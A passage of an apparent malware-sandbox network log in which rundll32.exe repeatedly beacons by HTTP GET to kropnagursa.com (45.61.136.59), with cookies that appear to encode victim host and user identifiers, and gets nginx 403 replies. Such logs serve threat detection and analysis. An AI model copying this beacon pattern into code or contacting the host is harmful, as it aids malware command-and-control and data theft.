                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            198192.168.2.44989445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:59.430684090 CET2361OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:59.595583916 CET2361INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            199192.168.2.44989545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:00.540647984 CET2362OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:00.706068993 CET2363INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            2192.168.2.44969845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:16:58.404550076 CET2110OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:16:58.571964979 CET2111INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:16:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            20192.168.2.44971645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:11.316499949 CET2133OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:11.481430054 CET2133INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            200192.168.2.44989645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:01.044667959 CET2363OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:01.212608099 CET2364INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            201192.168.2.44989745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:01.817985058 CET2365OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:01.982933998 CET2365INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            202192.168.2.44989845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:02.307708979 CET2366OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:02.472481966 CET2366INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            203192.168.2.44989945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:02.796530962 CET2367OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:02.964915991 CET2368INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            204192.168.2.44990045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:03.270087957 CET2368OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:03.434962034 CET2369INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            205192.168.2.44990145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:03.755059004 CET2370OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:03.920068026 CET2370INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            206192.168.2.44990245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:04.242434025 CET2371OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:04.407473087 CET2371INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            207192.168.2.44990345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:04.740597963 CET2372OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:04.905354023 CET2373INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            208192.168.2.44990445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:05.255369902 CET2374OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:05.420119047 CET2374INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:05 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            209192.168.2.44990545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:05.736449003 CET2375OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:05.901186943 CET2375INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:05 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            21192.168.2.44971745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:11.800641060 CET2134OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:11.965662956 CET2135INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            210192.168.2.44990645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:06.203741074 CET2376OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
